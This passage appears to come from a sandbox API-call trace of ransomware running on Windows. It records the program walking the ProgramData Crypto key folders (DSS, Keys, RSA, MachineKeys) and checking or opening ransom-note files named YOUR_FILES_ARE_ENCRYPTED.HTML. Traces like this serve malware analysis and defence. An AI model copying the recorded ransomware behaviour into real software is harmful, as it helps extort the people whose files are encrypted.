returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*" [0169.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.781] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.781] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DSS", cAlternateFileName="")) returned 1 [0169.781] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned 43 [0169.781] GetProcessHeap () returned 0x270000 [0169.781] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.784] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" [0169.784] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*" [0169.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.784] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.785] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0169.785] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 55 [0169.785] GetProcessHeap () returned 0x270000 [0169.785] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.786] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" [0169.786] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*" [0169.786] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.786] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.787] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.787] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0169.787] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.787] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.787] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.787] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0169.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.787] GetProcessHeap () returned 0x270000 [0169.788] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.788] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.788] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.788] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.788] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.788] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.788] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.789] GetProcessHeap () returned 0x270000 [0169.789] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.789] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Keys", cAlternateFileName="")) returned 1 [0169.789] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned 44 [0169.789] GetProcessHeap () returned 0x270000 [0169.789] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.789] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys" [0169.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*" [0169.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.790] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.790] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.790] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0169.790] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.790] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.790] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.790] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0169.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.790] GetProcessHeap () returned 0x270000 [0169.791] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.791] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 1 [0169.791] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned 43 [0169.791] GetProcessHeap () returned 0x270000 [0169.791] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.791] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" [0169.791] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*" [0169.791] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.791] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.791] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0169.792] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 55 [0169.792] GetProcessHeap () returned 0x270000 [0169.792] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.792] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys" [0169.792] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*" [0169.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.792] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.792] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.792] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0169.792] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.792] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcba35340, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba35340, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba35340, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.792] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.792] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0169.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.792] GetProcessHeap () returned 0x270000 [0169.793] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.793] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba5b4a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.793] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.793] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.793] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcba5b4a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.793] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.793] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML" 